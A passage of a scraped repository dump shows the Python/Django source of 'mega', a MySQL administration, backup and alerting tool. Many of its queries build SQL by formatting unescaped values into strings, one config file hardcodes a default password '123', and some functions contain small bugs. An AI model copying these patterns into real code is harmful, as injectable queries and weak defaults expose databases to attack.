__init__(self,data):\n self.target=data.get('target')\n self.model=data.get('model')\n self.stat=data.get('stat',0)\n self.level=data.get('level',1)\n self.msg=data.get('msg','')\n self.q=PyMySQL()\n \n def add_alert(self):\n if not self.msg:\n return False\n sql=\"insert into alert(target,model,stat,level,msg) values('%s','%s',%s,%s,'%s')\" %(self.target,self.model,self.stat,self.level,self.msg)\n return self.q.execute(sql)\n \n def get_alert(self):\n pass " }, { "alpha_fraction": 0.7692307829856873, "alphanum_fraction": 0.7692307829856873, "avg_line_length": 28.714284896850586, "blob_id": "9159ed898fef3733886e472de0d4a2317ad26255", "content_id": "d18bb2574f54094c195baebfe3a796c5cb29b5e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 208, "license_type": "no_license", "max_line_length": 84, "num_lines": 7, "path": "/src/scripts/install.sh", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n#used to install application\n\nPROJECT=mega\nchmod a+x /export/servers/app/mega/src/mega_service/mega_server.py\nln -sf /export/servers/app/mega/src/mega_service/mega_server.py /etc/init.d/$PROJECT\n" }, { "alpha_fraction": 0.54786217212677, "alphanum_fraction": 0.5634971261024475, "avg_line_length": 28.02777862548828, "blob_id": "1fd16fc14a774ce381228410fb1b077ae001107f", "content_id": "37fe0a0951a4d19969593963a5a67722e4da7ec5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3134, "license_type": "no_license", "max_line_length": 101, "num_lines": 108, "path": "/src/lib/utils.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "import re\nimport time\nimport datetime\nfrom email import Utils\nfrom email.mime.text import MIMEText\nfrom email import Header\nimport smtplib\nimport httplib\n\nfrom conf.settings import EMAIL_SERVER,SMS_SERVER\n\ndef check_ip(ip):\n '''\n check the ip address is correct or not\n '''\n result=False\n if ip:\n ip_match = re.match('((2[0-4]\\d|25[0-5]|[01]?\\d\\d?)\\.){3}(2[0-4]\\d|25[0-5]|[01]?\\d\\d?$)',ip) \n if ip_match:\n result=True\n return result\ndef is_int(value):\n try:\n if not isinstance(int(value),int):\n return False\n except:\n return False\ndef today(day=None,format=None):\n '''\n if day is given ,return the date N(day) days ago \n else is today\n '''\n if not format:\n format='%Y-%m-%d'\n if day:\n return (datetime.datetime.now()-datetime.timedelta(days=day)).strftime(format)\n else:\n return datetime.datetime.today().strftime(format)\n\ndef 
now(format=None):\n '''\n return current time \n '''\n if not format:\n format='%Y-%m-%d %X'\n return time.strftime(format, time.localtime())\n \nclass SendMail():\n '''\n A mail send client in HTML.\n Args:\n subject: subject;\n content: Content in HTML;\n temail: A list() of Recipients;\n femail: sender address, default is '[email protected]';\n priority: priority\n \n Useage:\n import utils\n s=utils.SendMail('test')\n subject = \"Test mail from 172.17.58.25\"\n content = \"<H1>Test</H1>\"\n temail = (\"[email protected]\",)\n s.sendmail(subject, content, temail)\n '''\n \n DEFAULT_FEMAIL='[email protected]'\n DEFAULT_PRIORITY=\"3\"\n \n def __init__(self,module):\n self.module=module\n \n def sendmail(self,subject,content,temail,femail=DEFAULT_FEMAIL,priority=DEFAULT_PRIORITY):\n# log.debug(\"Get mail task : %s for %s\" % (subject,self.module))\n if len(str(subject))*len(content)*len(temail) == 0:\n return False,'illegal argument!'\n mime = MIMEText(content,'html', 'utf-8')\n mime['To'] = \", \".join(temail)\n mime['From'] = femail\n mime['Subject'] = Header.Header(subject,'utf-8')\n mime['X-Priority'] = priority\n mime['Date'] = Utils.formatdate(localtime = 1)\n try:\n s = smtplib.SMTP(EMAIL_SERVER)\n s.sendmail(femail, temail, mime.as_string())\n# log.info(\"Mail task:%s %s :%s\" % (self.module,subject,temail))\n return True,''\n except smtplib.SMTPException, se:\n return False,se\n# log.error(se)\n \ndef sms(to_mail,msg):\n '''\n to_mail: 1111,222,333\n msg: 'test'\n '''\n if not to_mail or not msg:\n return False\n url=\"http://%s:%s/sms.php?phone=%s&sms=%s\" % (SMS_SERVER[0],SMS_SERVER[1],to_mail,msg)\n try:\n conn=httplib.HTTPConnection(SMS_SERVER[0],port=SMS_SERVER[1])\n conn.request('GET', url)\n response=conn.getresponse()\n if response.getheaders():\n return True\n except Exception as ex:\n# log.error(ex)\n return False" }, { "alpha_fraction": 0.6004887223243713, "alphanum_fraction": 0.61331707239151, "avg_line_length": 26.299999237060547, "blob_id": "0637aade1885f3e0f0a4fa4ed87aae4469d1ed7c", "content_id": "61a8b8ce57c917c47270e87a012be40cfd12ab97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1637, "license_type": "no_license", "max_line_length": 81, "num_lines": 60, "path": "/src/apis/alert.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Sep 24, 2014\n\n@author: xchliu\n\n@module:apis.alert\n'''\nimport sys\nsys.path.append('/Users/xchliu/Documents/workspace/mega/src')\n\n\nimport datetime\nfrom lib.logs import Logger\nfrom lib.utils import today\nfrom mega_web.console.backup import Backup \nfrom mega_web.entity.models import Alert\n\nMODEL='API-Alert'\nlog = Logger(MODEL).log()\n\ndef alert_routine_hour(time=None):\n '''\n must be called only once in an hour \n '''\n if not time:\n time=datetime.datetime.now().strftime('%H:%M')\n hour,minite=time.split(':') \n #backup\n backup=Backup()\n failed_backup=backup.get_failed_backup(time)\n #only check once per day for daily task \n if int(hour)==9:\n uninvoked_backup=backup.get_uninvoked_backup(today(1))\n unaviable_backup=backup.get_unavailable_backup()\n pack_alert('backup',uninvoked_backup,level=1,stat=0,head='uninvoked backup:')\n pack_alert('backup',unaviable_backup,level=1,stat=0,head='unaviable backup:')\n pack_alert('backup',failed_backup,level=1,stat=0,head='failed backup:')\n\ndef pack_alert(model,data,level=1,stat=0,head=''):\n if not data or not model:\n return\n result={\n 'target':None,\n 
'model':model,\n 'level':level,\n 'stat':stat,\n 'msg':None\n }\n for d in data:\n result['target']=':'.join([str(x) for x in d[1:3]])\n result['msg']=head+'-'.join([str(x) for x in d[3:-1]])\n res,ex=Alert(result).add_alert()\n if not res:\n log.warn(ex)\n\ndef main():\n alert_routine_hour()\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.6340852379798889, "alphanum_fraction": 0.6566416025161743, "avg_line_length": 19, "blob_id": "f57e68a0ea3a265df45a714a975811d10e663227", "content_id": "13d765c0390ec421d459103309fd0bdbbf3bb852", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 399, "license_type": "no_license", "max_line_length": 43, "num_lines": 20, "path": "/src/mega_web/lib/paginator.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 1, 2014\n\n@author: xchliu\n\n@module:mega_web.lib.paginator\n'''\n\nfrom django.core.paginator import Paginator\n\ndef paginator(object,page_num=1):\n result={}\n if not object:\n return result\n p=Paginator(list(object),15)\n result['pages']=p.num_pages\n result['page_range']=p.page_range\n result['page_data']=p.page(page_num)\n return result" }, { "alpha_fraction": 0.6044142842292786, "alphanum_fraction": 0.6298811435699463, "avg_line_length": 15.857142448425293, "blob_id": "e38787d48ffce16eec447c39598e2c28e897cc13", "content_id": "f8711fa77a5cc39a3cb2f17d2691cb3486ff36e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 589, "license_type": "no_license", "max_line_length": 57, "num_lines": 35, "path": "/src/mega_service/mega.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Aug 1, 2014\n\n@author: xchliu\n\n@module:mega_service.mega\n'''\nimport sys\ntry:\n from mega_client.sender import MegaClient\nexcept:\n from mega_client.mega_client.sender import MegaClient\n \ndef sync_file(host='localhost'):\n cmd='sync_file'\n c=MegaClient(host,port=1105,cmd=cmd)\n c.run()\n\n\ndef client_update(host='localhost'):\n \n cmd='upgrade.py'\n c=MegaClient(host,port=1105,cmd=cmd)\n return c.run(TARGET='python',TYPE=1)\n \n\n\ndef main():\n #sync_file()\n client_update()\n return\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.529026985168457, "alphanum_fraction": 0.5437448620796204, "avg_line_length": 30.35897445678711, "blob_id": "84a220fb223650be43c508f6f9e232367b64d197", "content_id": "9793b01b8dd09004256d1d44a96a376f68854aef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1223, "license_type": "no_license", "max_line_length": 89, "num_lines": 39, "path": "/src/mega_client/mega_client/logs.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "import logging\ntry:\n from setting import DEAFULT_LOG_DEBUG\n from setting import LOG_FILE_NAME\nexcept:\n DEAFULT_LOG_DEBUG=False\n LOG_FILE_NAME='/tmp/mega_client.log'\n\n\nclass Logger:\n def __init__(self,model,logfile=None):\n if DEAFULT_LOG_DEBUG :\n self.level=0\n else:\n self.level=3\n if logfile:\n self.logfile=logfile\n else:\n self.logfile=LOG_FILE_NAME\n self.model=model\n def log(self):\n LEVELS = {0: logging.DEBUG,\n 3: logging.INFO,\n 2: logging.WARNING,\n 1: logging.ERROR}\n level=LEVELS.get(self.level,logging.NOTSET) \n logging.basicConfig(level=level,\n filename=self.logfile,\n datefmt='%Y-%m-%d %H:%M:%S',\n format='%(asctime)s %(name)-12s %(levelname)-5s 
%(message)s')\n logger=logging.getLogger(self.model)\n #handler = logging.handlers.RotatingFileHandler(\n # self.logfile, maxBytes=1024*1024, backupCount=5) \n #logger.addHandler(handler)\n return logger\n\nif __name__==\"__main__\":\n log=Logger('test').log()\n log.error(\"error\")\n" }, { "alpha_fraction": 0.6747331023216248, "alphanum_fraction": 0.7003558874130249, "avg_line_length": 22.04918098449707, "blob_id": "d2b52dd2caf72ff9303cf9c24cfc4addd585002a", "content_id": "96fc54b76ae6533289334e8fc1e78e741aefeeea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1409, "license_type": "no_license", "max_line_length": 84, "num_lines": 61, "path": "/src/conf/GlobalConf.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "#-*- coding: utf-8 -*-\n\nimport socket\n#bool\nif socket.gethostname() == \"xchliu.lan\":\n DEBUG = True\nelse:\n DEBUG = False\nDEV=DEBUG\n#log\nDEAFULT_LOG_DEBUG=DEBUG\n#Service\nDEFAULT_TCP_PORT=1104\nDEFAULT_TCP_HOST='0.0.0.0'\nTCP_HEADER={'HEAD':'MEGA'}\n\n#default values\nDEFAULT_OS='Linux'\nDEFAULT_LEVEL=1\nDEFAULT_OWNER=1\nDEFAULT_DBTYPE='MySQL'\nDEFAULT_HATYPE='MS'\nDEFAULT_BUSINESS=1\nDEFAULT_DB_PORT=3306\nDEFAULT_PWD='123'\n#STAT\nSTAT_ONLINE=1\nSTAT_OFFLINE=0\n#TIME\nDATETIME_FORMATE=\"%Y-%m-%d %H:%M:%S\"\n\n#API \nERR_CODE_DEFAULT=None #INIT CODE :Nonmeaning\nERR_CODE_UNKOWN=-1 #UNKONW\nERR_CODE_SUCCESS=0 #NO ERROR OCCUR\nERR_CODE_INVALID=2\n\n#messages\nMSG_ERR_IP='Invalid IP !'\nMSG_ERR_PORT='Invalid PORT !'\nMSG_ERR_LEVEL='Invalid LEVEL !'\nMSG_ERR_NAME='Invalid NAME !'\nMSG_ERR_INSTANCE_EXITST='Instance already exists !'\nMSG_ERR_BUSINESS_EXITST='Business already exists !'\nMSG_ERR_DB_EXITST='Database already exists !'\nMSG_ERR_SERVER_EXITST='Server already exists !'\n\n#backup\nBACKUP_TOOL=['xtrabackup','mysqldump','mysqlbinlog','mydumper','rman','expdp','exp']\nBACKUP_TYPE=['full','increment','binlog','archivelog']\nBACKUP_LEVEL=['instance','db','table']\nBACKUP_CYCLE=['day','week','month']\nMIN_BACKUP_PERIOD=7\n#meta data\nOS=['Linux','Other']\nLEVEL=[1,2,3]\nDB_TYPE=['MySQL','Oracle','Other']\nHA_TYPE=['MS','None']\nVERSION=['5.1','5.5','5.6']\nFAILOVER=['ONLINE','ENFORCE']\nPLANT=['UNKOWN','亦庄','M6_jr','M6_wy']" }, { "alpha_fraction": 0.494047611951828, "alphanum_fraction": 0.5357142686843872, "avg_line_length": 11.071428298950195, "blob_id": "4accd344e0bb2e85c038227975a891e77565ad36", "content_id": "a507ef5fdbb3bfb40df9a54d14df9997e1502ada", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 168, "license_type": "no_license", "max_line_length": 28, "num_lines": 14, "path": "/src/mega_web/charts/home.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Aug 18, 2014\n\n@author: xchliu\n\n@module:mega_web.charts.home\n'''\n\n \ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.6672587394714355, "alphanum_fraction": 0.7383067011833191, "avg_line_length": 30.27777862548828, "blob_id": "a37513442225b57fb2ff5361df5a288bb3f76e45", "content_id": "6e7d20eb6acb10d4b76b59dc2254e8348f1f8b2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1689, "license_type": "no_license", "max_line_length": 73, "num_lines": 54, "path": "/src/release/db_schema_his.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Jul 2, 2014\n\n@author: 
xchliu\n\n@module:release.db_schema_his\n'''\n\n#2014-07-03\nalter table business add unique index idx_name(name);\nalter table `databases` add unique index idx_name(name);\nalter table instance add unique index idx_instance(ip,port);\nalter table server add unique index idx_ip(ip);\n\n\n#2014-07-03\nalter table instance add column version varchar(10) not null default '0';\nalter table task add column script varchar(50) not null default '';\n CREATE TABLE `document` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `file` varchar(100) NOT NULL,\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB;\n\n#2014-08-04\nalter table task add column stat int not null default 1;\nalter table task change target target varchar(200) not null default '';\nalter table task_log add column stat int not null default 0;\nalter table task_log change run_counts run_counts int not null default 0;\n\n#2014-0-15\nalter table instance add column slowlog int not null default 1;\n\n#2014-08-20\nalter table slowlog_info add hash_code varchar(50) not null after id;\nalter table slowlog_info add instance_id int not null after hash_code;\nalter table slowlog_info add stat int not null default 0;\n\n#2014-08-27\nCREATE TABLE `slowlog_opt` (\n `id` int(11) NOT NULL AUTO_INCREMENT,\n `hash_code` varchar(64) NOT NULL,\n `opt_method` varchar(50) NOT NULL,\n `opt_explain` varchar(200) NOT NULL,\n `opt_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',\n PRIMARY KEY (`id`)\n) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=utf8;\n\n#2014-09-25\nalter table server add column plant varchar(50) not null default '';\n\n2014-10-17\nalter table instance add cnf_file varchar(100) not null default '';\n" }, { "alpha_fraction": 0.47951310873031616, "alphanum_fraction": 0.48712095618247986, "avg_line_length": 38.32478713989258, "blob_id": "aab7632641a6e60b914c8159b7fc40fec82766c2", "content_id": "16ec80dd9de71dfd454348288598477aa2c76b1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9201, "license_type": "no_license", "max_line_length": 178, "num_lines": 234, "path": "/src/mega_service/resource/sync_baseinfo.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Oct 17, 2014\n\n@author: xchliu\n\n@module:mega_service.resource.sync_baseinfo\n'''\n\nfrom lib.utils import now\nfrom mega_web.resource.database_manage import DatabaseGet\nfrom mega_web.resource.database_manage import DatabaseManage\n\nfrom lib.logs import Logger\n\nMODEL='Service-resource'\nlog=Logger(MODEL).log()\n\nclass SyncBasic():\n '''\n sync the instance basic infomation with the given data\n base=['variables','table_status','mysql_user','db_name','base']+['timestamp']+['except']\n state=['status','slave_status']+['timestamp']+['except']\n \n instance:\"ip:port\"\n '''\n \n def __init__(self,instanceid,instance=None,tag_time=None):\n self.instance_id=instanceid\n if instance:\n self.instance_ip,self.instance_port=instance.split(':')\n else:\n self.instance_ip=self.instance_port=''\n if tag_time: \n self.tag_time=tag_time\n else:\n self.tag_time=now()\n self.q=PyMySQL()\n \n def sync_base(self,data,key):\n keys={'base':self.sync_instance,\n 'status':self.sync_status,\n 'variables':self.sync_variables,\n 'table_status':self.sync_table_info,\n 'mysql_user':self.sync_user_info,\n 'db_name':self.sync_db_info,\n 'slave_status':self.sync_slave_status\n }\n if key in keys:\n keys.get(key)(data)\n else:\n log.warn(\"unexpected key:%s .available keys:%s \" % (key,[key for key in 
keys])) \n \n def sync_instance(self,data=None):\n '''\n 'cnf': '/exportrvers/data/my3308/my.cnf'\n 'version': u'5.6.16'\n '''\n if not data:\n return False \n sql=\"update instance set version='%s',cnf_file='%s' where id=%s\" %(data.get('version'),data.get('cnf'),self.instance_id) \n self.q.execute(sql) \n return True\n \n def sync_variables(self,data=None):\n '''\n sync the variables \n '''\n for var in data:\n try:\n var_id=self.get_var_id(var)\n if var_id:\n sql=\"insert variables_his(instance_id,variable_id,value,insert_time) values(%s,%s,'%s','%s')\" \\\n % (self.instance_id,var_id,data.get(var,'null'),self.tag_time)\n# log.debug(sql)\n result,ex=self.q.execute(sql)\n if not result:\n log.error('Failed to save variable data as :%s' % ex)\n except Exception as ex:\n log.error(\"Save variables info failed :%s\" % ex)\n \n def sync_table_info(self,data=None):\n '''\n sync the table status \n {'ENGINE': 'InnoDB', 'TABLE_ROWS': '0', 'INDEX_LENGTH': '16384', 'DATA_LENGTH': '16384', 'db_name': 'dbchecksum', 'TABLE_NAME': '_dba_worksheet', 'TABLE_COMMENT': ''} \n '''\n for table in data:\n try:\n table_name=table.get('table_name','')\n if not table_name:\n continue\n #get database id\n db_name=table.get('db_name') \n db=DatabaseGet().get_database_unique(self.instance_id,db_name)\n if db:\n db_id=db[0].get('id')\n else: \n self.sync_db_info([db_name])\n db=DatabaseGet().get_database_unique(self.instance_id, db_name)\n if db:\n db_id=db[0].get('id')\n else:\n db_id=0\n index_size=table.get('index_length',0)\n data_size=table.get('data_length',0)\n table_rows=table.get('table_rows',0)\n engine=table.get('engine','') \n sql=\"insert into tables (instance_id,db_id,table_name,index_size,data_size,table_rows,engine,insert_time) \\\n values(%s,%s,'%s',%s,%s,%s,'%s','%s')\" %(self.instance_id,db_id,table_name,index_size,data_size,table_rows,engine,self.tag_time)\n result,ex=self.q.execute(sql)\n if not result:\n log.error(ex)\n except Exception as ex:\n log.error(\"Save table info failed :%s\" % ex)\n \n def sync_user_info(self,data=None):\n '''\n sync the user info\n {'[email protected]': \"GRANT SELECT, INSERT, LOCK TABLES ON `dbchecksum`.* TO 'dbchecksum'@'172.17.62.45'\",\n '[email protected]': \"GRANT ALL PRIVILEGES ON *.* TO 'zhanglei'@'172.17.62.38'} \n '''\n for user in data:\n _user,_host=user.split('@')\n try:\n sql='''insert mysql_user(instance_id,name,host,privilege,insert_time) values(%s,'%s','%s',\"%s\",'%s')''' \\\n % (self.instance_id,_user,_host,data.get(user,'null'),self.tag_time)\n #log.debug(sql)\n result,ex=self.q.execute(sql)\n if not result:\n log.error('Failed to save user info as %s@%s:%s' % (_user,_host,ex))\n except Exception as ex:\n log.error(\"Save user info failed :%s\" % ex) \n return\n \n def sync_db_info(self,data=None):\n '''\n sync the db info,add the database info if the db not found\n ['dbchecksum', 'dbchecksum_bak', 'mega', 'report']\n '''\n for db in data:\n try:\n db_id=DatabaseGet().get_database_unique(self.instance_id, db)\n if not db_id:\n result,msg=DatabaseManage({\"database_name\":db,\"database_ip\":self.instance_ip,\"database_port\":self.instance_port}).add_database()\n if result:\n log.info(\"Add database : %s\" % db)\n else:\n log.error(\"Failed to add database %s :%s\" % (db,msg))\n except Exception as ex:\n log.error(\"Save db info failed :%s\" % ex)\n \n def sync_status(self,data=None):\n '''\n sync the status\n '''\n for status in data:\n try:\n status_id=self.get_status_id(status)\n if status_id:\n sql=\"insert 
status_his(instance_id,status_id,value,insert_time) values(%s,%s,'%s','%s')\" \\\n % (self.instance_id,status_id,data.get(status,'null'),self.tag_time)\n result,ex=self.q.execute(sql)\n if not result:\n log.error('Failed to save variable data as :%s' % ex)\n except Exception as ex:\n log.error(\"Save status info failed :%s\" % ex)\n \n def sync_slave_status(self,data=None):\n '''\n sync the slave status\n '''\n for status in data: \n try:\n sql=\"insert into slave_status(instance_id,name,value,insert_time) values(%s,'%s','%s','%s')\" \\\n % (self.instance_id,status,data.get(status,'null',self.tag_time))\n result,ex=self.q.execute(sql)\n if not result:\n log.error('Failed to save variable data as :%s' % ex)\n except Exception as ex:\n log.error(\"Save slave status info failed :%s\" % ex)\n\n def get_var_id(self,var):\n if not var:\n return None\n var=var.lower()\n #func to get the variable id\n def _get_id():\n sql=\"select id from variables where name='%s';\" % var\n var_id=self.q.fetchRow(sql)\n if var_id:\n return var_id[0]\n else:\n return None\n var_id=_get_id()\n #insert a new record if the variable does not exist\n if not var_id:\n sql=\"insert into variables(name) values('%s');\" % var\n result,ex=self.q.execute(sql)\n if result:\n var_id=_get_id()\n else: \n var_id=None \n log.error('Get variable id failed:%s %s' % (var,ex)) \n return var_id\n\n def get_status_id(self,status):\n if not status:\n return None\n #func to get the status id\n def _get_id():\n sql=\"select id from status where name='%s';\" % status\n status_id=self.q.fetchRow(sql)\n if status_id:\n return status_id[0]\n else:\n return None\n status_id=_get_id()\n #insert a new record if the variable does not exist\n if not status_id:\n sql=\"insert into status(name) values('%s');\" % status\n result,ex=self.q.execute(sql)\n if result:\n status_id=_get_id()\n else: \n status_id=None \n log.error('Get variable id failed:%s %s' % (status,ex)) \n return status_id\n\n \n \ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.5254237055778503, "alphanum_fraction": 0.5310734510421753, "avg_line_length": 22.302631378173828, "blob_id": "6ce6ac9e234b6f61a159b95d3482303f52e9de59", "content_id": "02970155884a51d5e87a1cf6387c80433ddc586d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1770, "license_type": "no_license", "max_line_length": 94, "num_lines": 76, "path": "/src/mega_web/resource/vip_manage.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "# -*- coding:utf-8 -*-\n'''\nCreated on Sep 2, 2014\n\n@author: xchliu\n\n@module:mega_web.resource.vip_manage\n'''\n\nfrom mega_web.entity.models import Vip\nfrom conf.GlobalConf import MSG_ERR_IP\n\n\n\nclass VipManage():\n '''\n '''\n def __init__(self,request):\n self.vip=request.get('vip')\n self.domain=request.get('domain')\n self.type=request.get('type')\n self.stat=request.get('stat')\n self.plant=request.get('plant')\n self.id=request.get('id')\n \n def _data_check(self): \n if not self.vip :\n return False\n return True\n \n def add_vip(self):\n if not self._data_check():\n return False,MSG_ERR_IP\n v=Vip()\n v.vip=self.vip\n v.domain=self.domain\n v.type=self.type\n v.stat=self.stat\n v.plant=self.plant \n v.save()\n return True,''\n \n def mod_vip(self):\n if not self._data_check():\n return False,MSG_ERR_IP\n v=Vip.objects.get(id=self.id)\n v.vip=self.vip\n v.domain=self.domain\n v.type=self.type\n v.stat=self.stat\n v.plant=self.plant \n v.save()\n return 
True,''\n \n \nclass VipGet():\n '''\n '''\n def __init__(self):\n self.vip=Vip\n \n def get_vip_list(self,type=1,count=10):\n if count == 0:\n vip_list=self.vip.objects.filter(type=type).order_by('stat','vip').values()\n else:\n vip_list=self.vip.objects.filter(type=type).order_by('stat','vip')[count].values()\n return vip_list\n \n def get_vip_by_ip(self,vip):\n vip_list=self.vip.objects.filter(vip=vip).values()\n return vip_list\n\ndef main():\n return\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.6190476417541504, "alphanum_fraction": 0.6190476417541504, "avg_line_length": 5.599999904632568, "blob_id": "ba616782b7ef5415db0f6703ba153f587ad2213f", "content_id": "786ebce87854d2ff734a3adb4ef6643d18b69233", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 274, "license_type": "no_license", "max_line_length": 28, "num_lines": 25, "path": "/docs/framework.md", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "#Mega 后台服务框架\n\n\n##主体逻辑\n* 监听请求\n* 主循环捕获定时任务\n* 任务推送\n\n##核心模块\n\n* 消息队列:multiprocessing queue\n\n* TCP server:\n\n* TCP 交互协议:\n\t\n\t数据包格式:\n\t\n\t返回错误码:\n\n* Worker\n\n* tracker\n\n* Daemon\n\t\n\n" }, { "alpha_fraction": 0.6484576463699341, "alphanum_fraction": 0.6504115462303162, "avg_line_length": 46.07044982910156, "blob_id": "cac5beb542cacc2856f9e3e3f97bbfba30e19a61", "content_id": "0788d3af5839cee2a32c735d2668506d3d55638e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24054, "license_type": "no_license", "max_line_length": 195, "num_lines": 511, "path": "/src/mega_web/views.py", "repo_name": "Captian5ye/mega", "src_encoding": "UTF-8", "text": "#-*- coding: utf-8 -*-\nfrom django.shortcuts import render_to_response,RequestContext,HttpResponse\nfrom django.contrib.auth.decorators import login_required\n\nfrom resource import instance_manage,server_manage,business_manage,database_manage,resource_manage,user_manage,vip_manage\nfrom console.backup import Backup,Backup_Config\nfrom console.failover import FailoverGet,FailoverManage\nfrom lib import paginator\nfrom lib.meta_data import MetaData \nfrom mega_portal.file_manage import UploadFileForm\nfrom mega_web.entity.models import Document\nfrom mega_service.task import Task\nfrom mega_web.console.task import TaskManage \nfrom mega_web.admin.views import * \nfrom mega_web.tunning import slowlog\nfrom mega_web.monitor import alert_manage\n\nmeta_data=MetaData()\n\n@login_required\ndef home(request):\n slow_log=slowlog.get_chart_total()\n alert_list=alert_manage.get_alert_list()\n return render_to_response('home.html',{'slowlog':slow_log,'alert_list':alert_list},context_instance=RequestContext(request))\n \n@login_required\ndef monitor(request):\n if request.method=='POST':\n alert_id=request.POST.get('alert_id')\n alert_manage.update_alert(alert_id)\n alert_list=alert_manage.get_alert_list()\n return render_to_response('monitor.html',{'alert_list':alert_list},context_instance=RequestContext(request))\n\n@login_required\ndef console(request):\n if request.method==\"GET\":\n return render_to_response('console.html',context_instance=RequestContext(request))\n else:\n return render_to_response('console.html',context_instance=RequestContext(request))\n\ndef tunning(request):\n if request.method==\"GET\":\n return render_to_response('tunning.html',context_instance=RequestContext(request))\n else:\n return render_to_response('tunning.html',context_instance=RequestContext(request))\n\ndef 
portal(request):\n if request.method==\"GET\":\n return render_to_response('portal.html',context_instance=RequestContext(request))\n else:\n return render_to_response('portal.html',context_instance=RequestContext(request))\n\ndef fun(request):\n if request.method==\"GET\":\n return render_to_response('fun.html',context_instance=RequestContext(request))\n else:\n return render_to_response('fun.html',context_instance=RequestContext(request))\n\n\n\n#Sub sites\n##resource\ndef instance(request):\n page_num=1\n if request.method==\"GET\":\n page_num=request.GET.get('page')\n instance_list_all=instance_manage.InstanceGet().get_instance_list(None,0)\n else:\n ip=request.POST.get(\"ip\")\n instance_list_all=instance_manage.InstanceGet().get_instance_list({\"ip\":ip},0)\n if not page_num:\n page_num=1\n page_data=paginator.paginator(instance_list_all, page_num)\n instance_list=page_data.get('page_data')\n page_range=page_data.get('page_range')\n return render_to_response('instance.html',{'instance_list':instance_list,'page_range':page_range},context_instance=RequestContext(request))\n\ndef instance_add(request):\n msg=''\n if request.method==\"POST\":\n result,msg=instance_manage.InstanceManage(request.POST).add_instance()\n if result:\n msg='Sucess' \n return render_to_response('instance_add.html',{\"business_list\":meta_data.business_list(),\"owner_list\":meta_data.owner_list(),\n \"db_type\":meta_data.db_type,\"level\":meta_data.level,\n \"ha_type\":meta_data.ha_type,\"msg\":msg,\"version_list\":meta_data.version,\n \"instance_list\":meta_data.instance_list()\n },context_instance=RequestContext(request))\n\ndef instance_detail(request):\n inst=instance_manage.InstanceGet()\n if request.method==\"GET\":\n instance_id=request.GET.get('instance_id')\n instance=inst.get_instance(request.GET)\n else:\n instance_id=request.GET.get('instance_id')\n if request.POST.get(\"type\")==\"mod\":\n instance_manage.InstanceManage(request.POST).mod_instance() \n else:\n instance_manage.InstanceManage(request.POST).stat_instance()\n instance=inst.get_instance(request.POST)\n instance_base=inst.get_instance_base(instance_id)\n failover=FailoverGet().get_instance_failover(instance_id)\n #database=inst.get_instance_list({\"\":\"\"}, count, offset)\n return render_to_response('instance_detail.html',{\"instance\":instance,\"readonly\":\"true\",\"business_list\":meta_data.business_list(),\n \"owner_list\":meta_data.owner_list(),\n \"db_type\":meta_data.db_type,\"level\":meta_data.level,\n \"ha_type\":meta_data.ha_type,\"version_list\":meta_data.version,\n \"instance_list\":meta_data.instance_list(),\n \"instance_base\":instance_base,\n \"failover\":failover\n },context_instance=RequestContext(request))\n\n##server\ndef server(request):\n if request.method==\"GET\":\n page_num=request.GET.get('page')\n server_list_all=server_manage.ServerGet().get_server_list(None, 0)\n if not page_num:\n page_num=1\n page_data=paginator.paginator(server_list_all, page_num)\n server_list=page_data.get('page_data')\n page_range=page_data.get('page_range')\n return render_to_response('server.html',{\"server_list\":server_list,'page_range':page_range},context_instance=RequestContext(request))\n else:\n ip=request.POST.get('ip')\n if not ip :\n server=server_manage.ServerGet().get_server_list(None, 0)\n else:\n server=[]\n server_id =server_manage.ServerGet().get_server_by_ip(request.POST.get(\"ip\"))\n if server_id:\n server.append(server_manage.ServerGet().get_server_by_id(server_id))\n return 
